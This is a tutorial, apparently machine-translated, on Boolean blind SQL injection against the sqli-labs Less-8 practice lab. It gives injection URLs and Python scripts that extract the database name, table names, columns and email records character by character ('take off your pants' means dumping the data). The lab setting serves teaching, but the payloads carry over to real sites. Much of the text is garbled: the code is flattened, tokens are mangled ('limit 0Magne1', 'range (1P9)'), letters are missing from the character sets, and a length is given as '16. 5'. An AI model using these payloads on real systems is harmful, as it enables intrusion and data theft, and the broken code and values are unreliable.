Shulou(Shulou.com)05/31 Report--

This article mainly introduces "the example explanation of Boolean blind injection in SQL injection". In the daily operation, I believe that many people have doubts on the example explanation of Boolean blind injection in SQL injection. The editor consulted all kinds of materials and sorted out simple and easy-to-use methods of operation. I hope it will be helpful to answer the doubts of "example explanation of Boolean blind injection in SQL injection". Next, please follow the editor to study!

Blind injection based on Boolean

The page of Web will only return True and False. Then Boolean blind injection is to inject SQL and then get the relevant information in the database according to the True or False returned by the page.

Due to the Boolean injection this time, the hand note can not take off the pants completely. So in this section we need to write a lot of code to help us do SQL injection and get the data. So there will be a lot of Python code in this chapter.

The example this time is Less-8.

By performing the injection test of the following statement

Http://localhost/sqlilabs/Less-8/?id=2'http://localhost/sqlilabs/Less-8/?id=2"http://localhost/sqlilabs/Less-8/?id=2\

When testing, the page cannot display content only when it is in id=2'. If the statement you enter meets the requirements, the page will display the content, but the content will be the same. In this case, the output on the page is completely useless to us, including information about SQL execution errors will not be displayed on the page. In this case, it is completely impossible to execute the SQL statement and then display the information returned after the SQL execution on the page. In this case, it is a typical SQL blind injection.

We use the content of the page to determine whether our SQL statement is correct, and then guess the information of the database.

Through the above injection test, we know that the injection statement of the background SQL is written as follows:

Select field from table where id='userinput'

The id parameter is enclosed in single quotation marks. We can't get any other information.

Get the name of the database

Before you can get the name of the database, you first need to get the length of the database

Http://localhost/sqlilabs/Less-8/?id=2' and length (database ()) > 1% 23 http://localhost/sqlilabs/Less-8/?id=2' and length (database ()) > 2% 23 and so on.

It is found that when the value is 8, the page is not displayed. So the length of database () is 8.

After you get the length of datbase (), you get the name of database ().

At this point, you can't rely entirely on manual notes, you have to write Python code to do it. The most important thing is to conduct a large number of injection tests to determine the right and wrong time for the program to execute, and then conclude that the current value may be the right value.

The following is a simple code that uses Python to get data by Boolean blind injection.

Def get_db_name (): result = "" url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii (substr (database (), {0}, 1)) > {1}% 23" chars = '0123456789ABCDEFGHIJKLMNOPQSTUVWXYZabcdefghijklmnopqrstuvwxyz' for i in range (1P9): for char in chars: char_ascii = ord (char) url = url_template.format (I) Char_ascii) response = requests.get (url) length = len (response.text) # the length returned is only 706 and 722 if length > 706: result + = char break print (result)

It is security who gets the final result, which is correct.

Get the table information in the database

In fact, all SQL injection steps are similar. First get the name of the database (this step is not required), then get the table name of the current database, then get the fields of the table, and finally take off your pants. This step is explained in the previous chapter.

First of all, look at a simple SQL blind injection to obtain database table information writing.

Http://localhost/sqlilabs/Less-8/?id=2' and ascii (substr ((select table_name from information_schema.tables where table_schema=database () limit 0Magne1), 1Magne1)) > 60% 23

In fact, we still use the previous statements such as select table_name from information_schema.tables where table_schema=database () limit 0Power1 to get the information of the table, but now it cannot be displayed on the page. Instead, we can get the table name by blind note, character by character.

The next step is also to write Python code to get the table name. The code is similar to the one above. It is mainly the URl under modification. Before Python can get the table name, we also need to know the length of the table name.

You can get it using the following statement.

The SQL injection to get the table name is written as follows

Http://localhost/sqlilabs/Less-8/?id=2' and (select length (table_name) from information_schema.tables where table_schema=database () limit 0Pol 1) > 0% 23

In this way we know that the length of the first table name in the database table is 6. Once you know the length of the table name, the next Python script is easy to write.

Def get_table_name (): result = "" url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii (substr ((select table_name from information_schema.tables where table_schema=database () limit 0ord 1), {0}, 1)) > {1}% 23" chars = '0123456789 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' for i in range (1): for char in chars: char_ascii = ord (char) url = url_template.format (I Char_ascii) response = requests.get (url) length = len (response.text) # the length returned is only 706 and 722 if length > 706: result + = char break print (result)

Finally, the first table name is emails, if you want to get other table names, you just need to change the code limit 0J1 to limit 1J1 or something else.

Get column information for the table name

You also need to know the length of the field in the table before you get the column name. For example, if we want to know the length in the emails table, we can use the following statement to get it.

Http://localhost/sqlilabs/Less-8/?id=2' and (select length (column_name) from information_schema.columns where table_name=0x656d61696c73 limit 0jie 1) > [num]% 23

You can change the value of num from 0 until the program goes wrong. In this way, we get that there are two fields in emails, and the length of the field is 2pg8.

After you get the field length, the next step is to do Boolean injection to get the field name.

Before you write code, let's look at how to write a sql statement that gets the name of a field. The following code is the code used to get the field name.

Http://localhost/sqlilabs/Less-8/?id=2' and ascii (substr ((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0jue 1), 1m 1)) > 60% 23

The Python code we wrote also uses the above code to get the field name.

Def get_column_name (): result = "" url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii (substr (select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0Power1), {0}, 1)) > {1}% 23" chars = '0123456789ABCDEFGHIJKLMNOPQSTUVWXYZABcdefghijklmnopqrstuvwxyz' for i in range (I): for char in chars: char_ascii = ord (char) url = url_template.format (I) Char_ascii) response = requests.get (url) length = len (response.text) # the length returned is only 706 and 722 if length > 706: result + = char break print (result)

From the above code, we can get that the field names that exist in the emails table are id and email_id, respectively.

Take off your pants

After getting the field name, the next most important step is to take off your pants.

Before taking off our pants, we first determine how many records there are in the emails table.

The statements used are as follows:

Http://localhost/sqlilabs/Less-8/?id=2' and (select count (*) from emails) > 0% 23

After modifying the 0 in > 0 to be 1 ~ 2 ~ 3, we get that there are 8 records in the emails table.

Then the next step is to take off your pants.

Before taking off our pants, we first need to know the length of the current record, and this SQL statement is also easy to write.

Http://localhost/sqlilabs/Less-8/?id=2' and (select length (email_id) from emails limit 0Power1) > 15% 23

Finally, we know that the length of the email_id in the first record in the emails table is 16. 5.

Once the length is known, the code is easy to write.

Def get_data (): result = "" url_template = "http://localhost/sqlilabs/Less-8/?id=2' and ascii (substr (select email_id from emails limit 0score1), {0}, 1)) > {1}% 23" chars = '.0123456789 ABCDEFGHIJKLMNOPQSTUVWXYZThe abcdefghijklmnopqrstuvwxyz'for i in range (1JE17): for char in chars: char_ascii = ord (char) url = url_template.format (I) Char_ascii) response = requests.get (url) length = len (response.text) # the length returned is only 706 and 722 if length > 706: result + = char break print (result)

Through the above code, you get that the content is Dumb@dhakkan.com, and the other content gets the data in the same way.

At this point, the study on "the example explanation of Boolean blind injection in SQL injection" is over. I hope to be able to solve everyone's doubts. The collocation of theory and practice can better help you learn, go and try it! If you want to continue to learn more related knowledge, please continue to follow the website, the editor will continue to work hard to bring you more practical articles!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.